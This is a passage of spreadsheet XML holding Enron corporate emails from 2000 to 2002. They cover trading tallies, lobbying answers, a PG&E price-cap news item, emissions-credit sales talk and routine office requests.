_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 08:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'andy.zipper@enron.com', 'louise.kitchen@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>FW: Crude 24x7 Marketing Effort</t>
  </si>
  <si>
    <t>Crude WTI 24x7 Marketing Effort_x000D_
_x000D_
Trade Count:_x000D_
 270 Trades _x000D_
 12.3 Millions of Barrels_x000D_
 10 Counterparties Transacting Today_x000D_
 31 Counterparties Transacting to Date_x000D_
 917 Millions of Barrels Transacted to Date_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
? Note, the Nymex Chart is for comparison purposes only. The EnronOnline _x000D_
numbers have been adjusted 10-fold to be in scale with the NYMEX volumes for _x000D_
charting purposes.</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 10:15:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'fildesd@phibro.com'})</t>
  </si>
  <si>
    <t>frozenset({'jborle@atb.com', 'pjoslyn@enmax.com', 'fildes@enron.com', "'joslyn@enron.com", 'fildesd@phibro.com', 'jromeril@seminolecanada.com'})</t>
  </si>
  <si>
    <t>RE: how about a bid?</t>
  </si>
  <si>
    <t>_x000D_
I gave you the wrong lot number... type in 1032 instead to get the Great_x000D_
One._x000D_
I think 1031 is Haakan Loob._x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Fildes, David _x000D_
&gt; Sent:	26 November 2001 18:00_x000D_
&gt; To:	'Jim Romeril'; 'Joslyn, Paul'; 'JBorle@atb.com'_x000D_
&gt; Cc:	'barry.tycholiz@enron.com'_x000D_
&gt; Subject:	how about a bid?_x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; Boys,  _x000D_
&gt; I am bored today and have proof to show you... _x000D_
&gt; Go to this website and type in 1031 in the sale number field.._x000D_
&gt; It's a beauty and would be a fine addition to any collector's gallery._x000D_
&gt; I would consider a joint venture with you for investment purposes on this_x000D_
&gt; find of a lifetime._x000D_
&gt; Personally, I think it looks a little like a late 70's drummer but it is_x000D_
&gt; the Great One nonetheless. _x000D_
&gt; It is a fine specimen of the era ' Short on the sides, but keep the length_x000D_
&gt; in the back'_x000D_
&gt; _x000D_
&gt; http://www.auktionsverket.se/starte.htm_x000D_
&gt; _x000D_
&gt; _x000D_
&gt; PS- the price is about 25,000 swedish kroners which i think is about $5000_x000D_
&gt; Canadian</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 05:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Mike Swerzbin just checked out with broker. Only one deal changed._x000D_
_x000D_
502391_x000D_
Mid-C_x000D_
_x000D_
502392_x000D_
Palo Verde_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
01/22/2001 01:45 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: natsource checkout_x000D_
_x000D_
502391 broker has palo verde_x000D_
_x000D_
502392  broker has mid c_x000D_
_x000D_
thanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 15:00:06 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Answers</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks! Looks good._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Robertson, Linda  _x000D_
Sent:	Monday, October 29, 2001 4:55 PM_x000D_
To:	Shapiro, Richard_x000D_
Subject:	Answers_x000D_
_x000D_
Question Two:_x000D_
No.  Enron's lobbying expenditures is very consistent with other entities in its field.  In addition, because of Enron's diverse portfolio of business investments it has a broad and diverse set of public policy interests.  Enron's DC expenditures also reflect the presence of our regulatory efforts._x000D_
 _x000D_
Question Three:_x000D_
At the Federal level Enron's public policy advocacy costs will be approximately the same in CY200l.  _x000D_
_x000D_
Question Four:_x000D_
Similar to other companies, Enron constantly alters its use of outside consultants depending on our needs at that time.  All firms we have retained should have registrations on file.   _x000D_
_x000D_
Question Five:_x000D_
Far from unusual, Linda Robertson was hired following a lengthy search in November 2000 to replace the retiring head of the DC office._x000D_
_x000D_
Question Six:_x000D_
Don't believe so._x000D_
_x000D_
Question Eight:_x000D_
We anticipate that the SEC inquiry will be handled by Enron's legal department._x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 09:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'angie.collins@enron.com'})</t>
  </si>
  <si>
    <t>CSX Coal Documents</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please follow up?_x000D_
_x000D_
thanks,_x000D_
_x000D_
Dan_x000D_
---------------------- Forwarded by Daniel Reck/HOU/ECT on 12/04/2000 05:06 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Susan M Scott_x000D_
12/04/2000 11:00 AM_x000D_
To: Daniel Reck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: CSX Coal Documents_x000D_
_x000D_
Dan,_x000D_
_x000D_
I am currently sitting in the Coal group's old area on 32.  While dealing _x000D_
with some computer issues Friday, I came across an expandable file full of _x000D_
Coal related documents buried beneath my desk.  The documents and contracts _x000D_
seem pretty old, which is why I assume no one has missed them.  Still, I _x000D_
wanted to contact you to see if you would like me to run them down rather _x000D_
than simply discard them.  If you could email or call me at x31455 and let me _x000D_
know what I should do with them I would appreciate it (as you know space is _x000D_
limited up here)._x000D_
_x000D_
Thanks,_x000D_
Susan_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 05:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'matthew.adams@enron.com'})</t>
  </si>
  <si>
    <t>Web Access</t>
  </si>
  <si>
    <t xml:space="preserve">Please grant me access to the rac website.  I am the manager for the central _x000D_
region - natural gas.  I need access to activate and inactivate and view all _x000D_
central books.  Please give me a call with any questions.  Thanks for your _x000D_
help._x000D_
PL_x000D_
3-7376_x000D_
_x000D_
---------------------- Forwarded by Phillip M Love/HOU/ECT on 05/14/2001 _x000D_
12:31 PM ---------------------------_x000D_
From: Jennifer Velasco/ENRON@enronXgate on 05/14/2001 09:49 AM_x000D_
To: Chad Ihrig/ENRON@enronXgate, Phillip M Love/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Web Access_x000D_
_x000D_
Please send this request to Matthew Adams.  He is the one who will help you _x000D_
with setting up access to the website._x000D_
_x000D_
Thank you._x000D_
Jennifer Velasco_x000D_
X 5-2526_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 7 Apr 2001 01:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/7/01; HourAhead hour: 9;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/7/01; HourAhead hour: 9;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001040709.txt</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 07:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>PG&amp;E Calls for Price Cap To Be Reduced</t>
  </si>
  <si>
    <t>PG&amp;E Calls For Price Cap To Be Reduced Below $250 MWh_x000D_
  _x000D_
09/25/2000 _x000D_
Dow Jones Energy Service _x000D_
(Copyright (c) 2000, Dow Jones &amp; Company, Inc.) _x000D_
LOS ANGELES -(Dow Jones)- Pacific Gas &amp; Electric Co. has asked federal _x000D_
regulators to lower the wholesale power price cap at the state's Independent _x000D_
System Operator real-time market and lift a state-mandated rate freeze so it _x000D_
can charge its customers market-based rates for electricity, according to _x000D_
documents obtained by Dow Jones Newswires. _x000D_
The PG&amp;E Corp. unit filed documents with the Federal Energy Regulatory _x000D_
Commission Friday saying the wholesale price of power it pays and what it _x000D_
charges consumers has forced the company into a $2.2 million debt. _x000D_
In addition, the utility says independent energy companies are charging _x000D_
"unfair" prices for electricity and that they should refund some money to _x000D_
customers to ease the "shock" its 4.5 million customers will feel when the _x000D_
rate-freeze is lifted. _x000D_
The company wants FERC to cap wholesale electricity prices at the ISO's _x000D_
"immediately," at a price lower than $250 per megawatt-hour. _x000D_
The rate-freeze, which protected consumers as the state moved to electricity _x000D_
competition, is scheduled to end in March 2002, but the company has _x000D_
petitioned state regulators to lift the rate-freeze sooner so it can avoid _x000D_
further debt. _x000D_
Gov. Gray Davis and the state's Public Utilities Commission said last week _x000D_
they do not support such a measure and that it would likely not happen before _x000D_
2002. _x000D_
   -By Jason Leopold; Dow Jones Newswires; 323-658-3874;_x000D_
jason.leopold@dowjones.com</t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 09:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mtg. w/David Port, Ted Murphy &amp; Rudy Zipter - RAC (Demo on_x000D_
 Software) - EB 2893 (In Port's office)</t>
  </si>
  <si>
    <t>Rita Hennesey 33075_x000D_
Acey (Rudi Zipter's office)</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 06:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Where are we meeting at 300?</t>
  </si>
  <si>
    <t>I'm on a conference call which I hope will end by then - a deal we are trying _x000D_
to close today.  YIKES!!!!_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 07:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>logomachy: M-W's Word of the Day</t>
  </si>
  <si>
    <t>***************************************************************_x000D_
Which U.S. city is the focus of Groundhog Day observance?_x000D_
Visit Punxsutawney, PA in our Geographical Dictionary._x000D_
http://www.merriam-webster.com/book/peoplace/geog.htm_x000D_
***************************************************************_x000D_
_x000D_
The Word of the Day for February 6 is:_x000D_
_x000D_
logomachy   \loh-GAH-muh-kee\   (noun)_x000D_
    *1 : a dispute over or about words_x000D_
     2 : a controversy marked by verbiage_x000D_
_x000D_
Example sentence:_x000D_
     "Quarreling about whether 'mathematics' and 'arithmetic'_x000D_
mean the same thing is nothing but a ridiculous logomachy,"_x000D_
Sheila declared stoutly._x000D_
_x000D_
Did you know?_x000D_
     It doesn't take much to start people arguing about words,_x000D_
but there's no quarrel about the origin of "logomachy." It comes_x000D_
from the Greek roots "logos," meaning "word" or "speech," and_x000D_
"machesthai," meaning "to fight," and it entered English in the_x000D_
mid-1500s. If you're a word enthusiast, you probably know that_x000D_
"logos" is the root of many an English word ("monologue,"_x000D_
"neologism," "logic," and most words ending in "-logy," for_x000D_
example), but what about other derivatives of "machesthai"?_x000D_
Actually, this is a tough one even for word whizzes. Only a few_x000D_
very rare English words come from "machesthai." Here are two of_x000D_
them: "heresimach" ("an active opponent of heresy and heretics")_x000D_
and "naumachia" ("an ancient Roman spectacle representing a_x000D_
naval battle")._x000D_
_x000D_
*Indicates the sense illustrated in the example sentence._x000D_
_x000D_
----------------_x000D_
Brought to you by Merriam-Webster, Inc._x000D_
http://www.Merriam-Webster.com_x000D_
----------------_x000D_
_x000D_
Subscribe or unsubscribe to Word of the Day via the Web at:_x000D_
http://www.Merriam-Webster.com/service/subinst.htm_x000D_
_x000D_
To join the list via e-mail, send a blank e-mail to:_x000D_
mw-wod-subscribe-request@listserv.webster.m-w.com_x000D_
To leave the list via e-mail, send a blank e-mail to:_x000D_
mw-wod-signoff-request@listserv.webster.m-w.com_x000D_
_x000D_
Questions about your subscription?_x000D_
Write to: mw-wod-request@listserv.webster.m-w.com_x000D_
Questions or comments about the Word of the Day?_x000D_
Write to: word@Merriam-Webster.com_x000D_
_x000D_
(c) 2002 by Merriam-Webster, Incorporated</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 19:00:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>New Opportunities in EU Gas and Power Retail Markets - CERA Private_x000D_
 Report</t>
  </si>
  <si>
    <t>_x000D_
Title: Slowly and Then Suddenly Opening Retail Gas and Power Markets in the European Union_x000D_
URL(s):_x000D_
_x000D_
http://www20.cera.com/eprofile?u=35&amp;m=2727;_x000D_
_x000D_
http://www20.cera.com/eprofile?u=35&amp;m=2728;_x000D_
_x000D_
http://www20.cera.com/eprofile?u=35&amp;m=2729;_x000D_
_x000D_
_x000D_
***********************************************************************_x000D_
_x000D_
NEW OPPORTUNITIES IN EU GAS AND POWER RETAIL MARKETS_x000D_
_x000D_
As the European Union energy directives take hold, the new opportunities in gas_x000D_
and power retail markets transcend geographic borders. Energy companies are_x000D_
seeking to leverage into new markets their knowledge of trading and selling_x000D_
wholesale energy or retailing products, where they either have or can acquire_x000D_
an energy supply asset base or customer base, develop strong retail marketing_x000D_
skills, and expand product slates._x000D_
_x000D_
* Incumbents will need to compete fiercely for initial retail market_x000D_
opportunities, using information technology to reach a much wider cross-section_x000D_
of energy customers._x000D_
_x000D_
* Winning strategies are successfully integrating retail, customer, marketing,_x000D_
and risk management expertise._x000D_
_x000D_
* Real obstacles persist-and the playing field will continue to change._x000D_
_x000D_
_x000D_
**end**_x000D_
_x000D_
Follow above URL for complete CERA Private Report._x000D_
_x000D_
E-mail Category: Private Report_x000D_
CERA Knowledge Area(s): Retail Energy, European Gas, European Power_x000D_
_x000D_
_x000D_
***********************************************************************_x000D_
***********************************************************************_x000D_
On September 17, CERA Chairman, Daniel Yergin, led a Global_x000D_
Client Conference Call discussion on the potential economic_x000D_
and energy industry fallout from the recent terrorist attacks_x000D_
on New York and Washington DC._x000D_
_x000D_
The playback of this conference call is now available at on the_x000D_
web at http://www.cera.com/highlights/teleconf_20010917/_x000D_
or via telephone at: 1-888-203-1112 (within the United States)_x000D_
or 719-457-0820 (outside the United States). Please use_x000D_
confirmation number 784004 to access the call playback._x000D_
The playback is available until October 17, 2001._x000D_
***********************************************************************_x000D_
***********************************************************************_x000D_
CERA's Autumn 2001 Roundtable event dates and agendas_x000D_
are now available at http://www20.cera.com/event_x000D_
***********************************************************************_x000D_
_x000D_
_x000D_
To make changes to your cera.com profile go to:_x000D_
http://www20.cera.com/client/updateaccount_x000D_
_x000D_
Forgot your username and password? Go to:_x000D_
http://www20.cera.com/client/forgot_x000D_
_x000D_
This electronic message and attachments, if any, contain information_x000D_
from Cambridge Energy Research Associates, Inc. (CERA) which is_x000D_
confidential and may be privileged. Unauthorized disclosure, copying,_x000D_
distribution or use of the contents of this message or any attachments,_x000D_
in whole or in part, is strictly prohibited._x000D_
Terms of Use: http://www20.cera.com/tos_x000D_
Questions/Comments: webmaster@cera.com_x000D_
Copyright 2001. Cambridge Energy Research Associates</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 02:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Ft Pierce</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Boyt/Corp/Enron on 03/23/2001 10:46 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Doug Leach @ ECT                           03/23/2001 10:36 AM_x000D_
	_x000D_
_x000D_
To: Bruce Golden/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Eric Boyt/Corp/Enron@Enron, Mathew Gimble/HOU/ECT@ECT, David _x000D_
Fairley/HOU/ECT, Justin Folloder/NA/Enron _x000D_
_x000D_
Subject: Ft Pierce_x000D_
_x000D_
A couple of quick questions about the truck deliveries to the H. D. King _x000D_
Power plant location:_x000D_
_x000D_
1) Do the delivering trucks need to have their own pumps?_x000D_
2) What size lines are the trucks pumping into? 3"?_x000D_
3) When connecting to our lines do the trucks need anything other than _x000D_
standard fittings? _x000D_
_x000D_
Outstanding issues:_x000D_
_x000D_
1) Full spec sheet--especially sodium and potassium guarantees_x000D_
2) After the initial tank fill delivery availability 24 hours/day and _x000D_
weekends?_x000D_
3) Tank fill and beyond--why not the full 1MM gallons?_x000D_
4) Dyed/non dyed fuel issue--tax evaluating_x000D_
5) Identify previous diesel supplier to the plant_x000D_
6) Design a fuel resupply plan including prepurchase of fuel, call on _x000D_
transportation, buy diesel calls for expected outage periods_x000D_
7) Buyer of record and credit issues with suppliers_x000D_
8) Tank fill price--fixed or floating? (Platt's, NYMEX, OPIS, rack price)_x000D_
9) Commercial start date of plan_x000D_
10) Any other issue to be discussed_x000D_
_x000D_
Did I leave anything out?_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 13:51:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mike.cowan@enron.com'})</t>
  </si>
  <si>
    <t>The market here for tommorow's close is 36 at 38._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cowan, Mike  _x000D_
Sent:	Tuesday, August 14, 2001 3:42 PM_x000D_
To:	Dorland, Chris_x000D_
Subject:	RE: _x000D_
_x000D_
Milly just told us too.  I hope the market doesn't hate that news._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dorland, Chris  _x000D_
Sent:	Tuesday, August 14, 2001 2:27 PM_x000D_
To:	Cowan, Mike_x000D_
Subject:	_x000D_
_x000D_
The patented move is starting to pay. This just in. Skilling resigns for personal reasons. Wow!_x000D_
_x000D_
cd</t>
  </si>
  <si>
    <t>Wed, 19 Jul 2000 02:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.burns@enron.com', 'scott.bolton@enron.com'})</t>
  </si>
  <si>
    <t>Re: BLM/Forest Service Right-of-Way Update</t>
  </si>
  <si>
    <t xml:space="preserve">Preliminary congratulations!.    Looks like a good plan.  Keep me posted._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stephen D Burns@ENRON_x000D_
07/19/2000 01:47 AM_x000D_
To: Richard Shapiro/HOU/EES@EES, James D Steffes/HOU/EES@EES_x000D_
cc: Scott Bolton/Enron Communications@Enron Communications, Joe _x000D_
Hillings/Corp/Enron@ENRON, Chris Long/Corp/Enron@ENRON (bcc: Steven J _x000D_
Kean/HOU/EES)_x000D_
Subject: BLM/Forest Service Right-of-Way Update_x000D_
_x000D_
The Senate voted on the Interior Appropriations Bill late yesterday.  Our _x000D_
amendment passed, which prevents either BLM or the Forest Service from _x000D_
enacting new fiber optic federal lands rights-of-way policies.  The BLM made _x000D_
a last ditch effort to defeat this in the Senate, but we had reached key _x000D_
Senators and staff and they got nowhere._x000D_
_x000D_
Action now moves to Conference, which for us means a focus on the House _x000D_
Conference members.  Scott and I will spend the next 2 days meeting with the _x000D_
key Republicans in the House.  We've already recruited the important _x000D_
Democrats.  Interior Approps Subcommittee Chairman Regula remains opposed, at _x000D_
least publicly, but we think we can get other Members to swing him.  We trust _x000D_
he'll come up with a sensible, face saving compromise on his own, eg, _x000D_
formally beginning a review process with his Subcommittee having oversight -- _x000D_
at this point, our language literally forbids BLM or Forest Service from even _x000D_
meeting to discuss the issue._x000D_
_x000D_
We continue, though, on several other fronts:_x000D_
_x000D_
1. We have the New Dems writing OMB on the issue and several Senators and _x000D_
Congressmen writing BLM and USFS_x000D_
2. We've increased the pressure on the White House, and are letting them know _x000D_
through very senior back door channels that in our opinion, BLM/Forest _x000D_
Service have not gotten the message.  Our position is that we'll be satisfied _x000D_
that they've changed their evil ways when the new assessment on the Mt. Hood _x000D_
EBS build is retracted._x000D_
3. We're preparing both Senate and House authorizing Committees for the _x000D_
longer-term issue next session.  We have no trouble finding champtions eager _x000D_
to own the issue_x000D_
4. We're engaging the Western Caucus for same_x000D_
5. Our adhoc coalition continues to grow in numbers and clout with over 20 _x000D_
companies and associations now actively engaged.  Enron chairs this _x000D_
initiative, with a tangible side benefit being much increased visibility and _x000D_
stature as a serious communications player._x000D_
6. Scott is successfully engaging state and local officials to weigh in from _x000D_
the end-user perspective_x000D_
_x000D_
BLM is on the retreat and has asked for a meeting, which we've refused.   We _x000D_
don't think they've given up though, and it's likely an issue of pride at _x000D_
this point.  So until the Approps process concludes we're continuing with the _x000D_
full court press._x000D_
_x000D_
Steve_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 08:06:33 -0800 (PST)</t>
  </si>
  <si>
    <t>Cool, what did he say?  Neither John or I will be around so no reason not to roll early. _x000D_
 Trevor Woods_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Taylor, Michael E &lt;Michael.E.Taylor@ENRON.com&gt;_x000D_
To: Woods, Trevor &lt;Trevor.Woods@ENRON.com&gt;_x000D_
Sent: Tue Nov 20 09:50:30 2001_x000D_
Subject: RE: _x000D_
_x000D_
I am doing her thing on Saturday in the middle of nowhere Texas.  Kind of a compromise.  My thing Thursday.   _x000D_
_x000D_
John told me to take off as early as I want tomorrow for the drive.  So I think I shall.  I called my boy at San Joaquin.  _x000D_
_x000D_
  _x000D_
_x000D_
-----Original Message-----_x000D_
From: Woods, Trevor _x000D_
Sent: Tuesday, November 20, 2001 9:37 AM_x000D_
To: Taylor, Michael E_x000D_
Subject: RE: _x000D_
_x000D_
_x000D_
Atta boy. Probably a good choice. Your girl okay with it?  GHG is a snoozer. Go ahead and call your boy. Tell him we're checking on some things. _x000D_
 Trevor Woods_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Taylor, Michael E &lt;Michael.E.Taylor@ENRON.com&gt;_x000D_
To: Woods, Trevor &lt;Trevor.Woods@ENRON.com&gt;_x000D_
Sent: Tue Nov 20 09:30:38 2001_x000D_
Subject: RE: _x000D_
_x000D_
I just got back from the greenhouse gas meeting.  The meeting was good. But you will be retired before that program is worth anything as far as a good trading program is concerned. _x000D_
_x000D_
John, said he talked with you on the phone about the b-plan.  I added a table of contents, and if John gives me anything to add I will._x000D_
_x000D_
I am going home (LA) tomorrow so I might work half a day.    _x000D_
_x000D_
-----Original Message-----_x000D_
From: Woods, Trevor _x000D_
Sent: Tuesday, November 20, 2001 9:25 AM_x000D_
To: Taylor, Michael E_x000D_
Subject: RE: _x000D_
_x000D_
_x000D_
Nah. I'm gonna keep it my little secret. _x000D_
 Trevor Woods_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Taylor, Michael E &lt;Michael.E.Taylor@ENRON.com&gt;_x000D_
To: Woods, Trevor &lt;Trevor.Woods@ENRON.com&gt;_x000D_
Sent: Tue Nov 20 09:22:09 2001_x000D_
Subject: RE: _x000D_
_x000D_
Just to keep up good relations.  I told him we would get back with him.  Please let me know if you do not call him._x000D_
_x000D_
-----Original Message-----_x000D_
From: Woods, Trevor _x000D_
Sent: Tuesday, November 20, 2001 8:44 AM_x000D_
To: Taylor, Michael E_x000D_
Subject: RE: _x000D_
_x000D_
_x000D_
I suppose. Nothing to tell him though. _x000D_
 Trevor Woods_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Taylor, Michael E &lt;Michael.E.Taylor@ENRON.com&gt;_x000D_
To: Woods, Trevor &lt;Trevor.Woods@ENRON.com&gt;_x000D_
Sent: Tue Nov 20 07:37:23 2001_x000D_
Subject: RE: _x000D_
_x000D_
I put it in my original message below.  It is 832-496-0123.  Tom Hartman with San Joaquin Power. I imagine a natural.  Are you going to call him today?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Woods, Trevor _x000D_
Sent: Monday, November 19, 2001 6:15 PM_x000D_
To: Taylor, Michael E_x000D_
Subject: RE: _x000D_
_x000D_
_x000D_
Is he a broker or a natural?  I've heard about the company through cantor. He's not going anywhere.  Everyone says they want to move fast then the jack around. You got his number?_x000D_
 Trevor Woods_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Taylor, Michael E &lt;Michael.E.Taylor@ENRON.com&gt;_x000D_
To: Woods, Trevor &lt;Trevor.Woods@ENRON.com&gt;_x000D_
Sent: Mon Nov 19 17:06:19 2001_x000D_
Subject: RE: _x000D_
_x000D_
I didn't want to talk price with him.  He saw our ERCs (that we just sold for $15,000) on website and called Kevin's line.  I was told to pick up the phone.  I told him somebody would call him back.  Either you or I would if you didn't want to call him.  He wanted to move fast, and he mentioned he used brokers in the past.  _x000D_
_x000D_
If none are out, I think we should call and tell him.    _x000D_
_x000D_
-----Original Message-----_x000D_
From: Woods, Trevor _x000D_
Sent: Monday, November 19, 2001 4:00 PM_x000D_
To: Taylor, Michael E_x000D_
Subject: RE: _x000D_
_x000D_
_x000D_
Who is that and how do you know him?  I haven't seen any come on since we sold some. What was his bid?  _x000D_
 Trevor Woods_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Taylor, Michael E &lt;Michael.E.Taylor@ENRON.com&gt;_x000D_
To: Woods, Trevor &lt;Trevor.Woods@ENRON.com&gt;_x000D_
CC: Massey II, John &lt;John.Massey@ENRON.com&gt;_x000D_
Sent: Mon Nov 19 15:56:46 2001_x000D_
Subject: RE: _x000D_
_x000D_
I just spoke with Tom Hartman of San Joaquin Power.  He wants up to 20 HGA NOx ERCS.  I told him I would have to check.  He wants to move quickly.  His number is 832-496-0123.  I know we do not have any, but I wanted to see if an arb was possible before we tell him we do not have any.</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 06:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'janice.moore@enron.com', 'kaye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'linda.simmons@enron.com', 'linda.noske@enron.com', 'richard.sanders@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jenny.helton@enron.com', 'mark.taylor@enron.com', 'mark.greenberg@enron.com', 'ed.iii@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'jan.king@enron.com', 'james.grace@enron.com', 'janette.elbertson@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'suzanne.adams@enron.com', 'linda.guinn@enron.com', 'samantha.boyd@enron.com', 'lance.schuler-legal@enron.com', 'sandi.braband@enron.com', 'taffy.milligan@enron.com', 'bob.carter@enron.com', 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'sheila.tweed@enron.com', 'janet.moore@enron.com', 'barbara.gray@enron.com', 'mark.haedicke@enron.com', 'dan.hyvl@enron.com', 'pat.radford@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'samantha.ferguson@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'steve.hooser@enron.com', 'matt.maxwell@enron.com', 'leslie.hansen@enron.com', 'stuart.zisman@enron.com', 'jeffrey.hodge@enron.com', 'peggy.banczak@enron.com', 'becky.spencer@enron.com', 'anne.koehler@enron.com', 'eric.gillaspie@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'angela.davis@enron.com', 'stacy.dickson@enron.com', 'robert.walker@enron.com', 'kay.young@enron.com', 'debra.perlingiere@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'peter.vecchio@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'travis.mccullough@enron.com', 'karen.jones@enron.com', 'brenda.whitehead@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'dale.rasmussen@enron.com', 'ann.white@enron.com', 'roger.balog@enron.com', 'teresa.bushman@enron.com', 'elizabeth.sager@enron.com', 'john.viverito@enron.com', 'dan.lyons@enron.com', 'shari.stack@enron.com', 'mary.heinitz@enron.com', 'tana.jones@enron.com', 'carol.clair@enron.com', 'sheri.cromwell@enron.com', 'dina.snow@enron.com', 'robert.bruce@enron.com'})</t>
  </si>
  <si>
    <t>Proposed Dissolution - Enron Administrative Services Corp. (Company_x000D_
 #446)</t>
  </si>
  <si>
    <t>Please see below.  Deb_x000D_
_x000D_
Deb Korkmas_x000D_
Enron North America Corp._x000D_
ENA Legal Dept._x000D_
1400 Smith Street, Room 3819_x000D_
Houston, TX  77002_x000D_
Phone:  713-853-5448_x000D_
Fax:  713-646-3393_x000D_
----- Forwarded by Deb Korkmas/HOU/ECT on 02/07/2001 02:23 PM -----_x000D_
_x000D_
	Teresa Callahan@ENRON_x000D_
	02/07/2001 02:15 PM_x000D_
		 _x000D_
		 To: David W Delainey/HOU/ECT@ECT, Greg Whalley/HOU/ECT@ECT, Julia _x000D_
Murray/HOU/ECT@ECT, Deb Korkmas/HOU/ECT@ECT, Frazier King/FGT/Enron@ENRON, _x000D_
John Swafford/HOU/ECT@ECT, Greek Rice/Corp/Enron@ENRON, Larry _x000D_
Dallman/GPGFIN/Enron@ENRON, James L Bouillion/HOU/ECT@ECT, James _x000D_
Derrick/Corp/Enron@ENRON, Mark Holsworth/Corp/Enron@ENRON, Charles _x000D_
Cheek/Corp/Enron@ENRON, Becky Stephens/Corp/Enron@ENRON, Janice _x000D_
Priddy/HR/Corp/Enron@ENRON, Lisa Norman/HR/Corp/Enron@ENRON, Ling _x000D_
Li/Corp/Enron@ENRON, Cynthia Barrow/HR/Corp/Enron@ENRON, Mary _x000D_
Perkins/Enron@EnronXGate, Kate Cole/Corp/Enron@ENRON, Geneva _x000D_
Holland/Corp/Enron@ENRON, Teresa Callahan/Corp/Enron@Enron, Sylvia _x000D_
Hu/Corp/Enron@ENRON, Wanda LaBaume/Enron Communications@Enron Communications, _x000D_
Johnson Leo/GPGFIN/Enron@ENRON, Stacey A Aune/HOU/ECT@ECT, Greg _x000D_
Whiting/Corp/Enron@ENRON, Hardie Davis/Corp/Enron@ENRON, Carol _x000D_
Essig/Corp/Enron@ENRON, Taria Reed/Corp/Enron@ENRON, Kelly _x000D_
Johnson/Corp/Enron@ENRON, Jerry Thomas Moore/Corp/Enron@ENRON, Lynda _x000D_
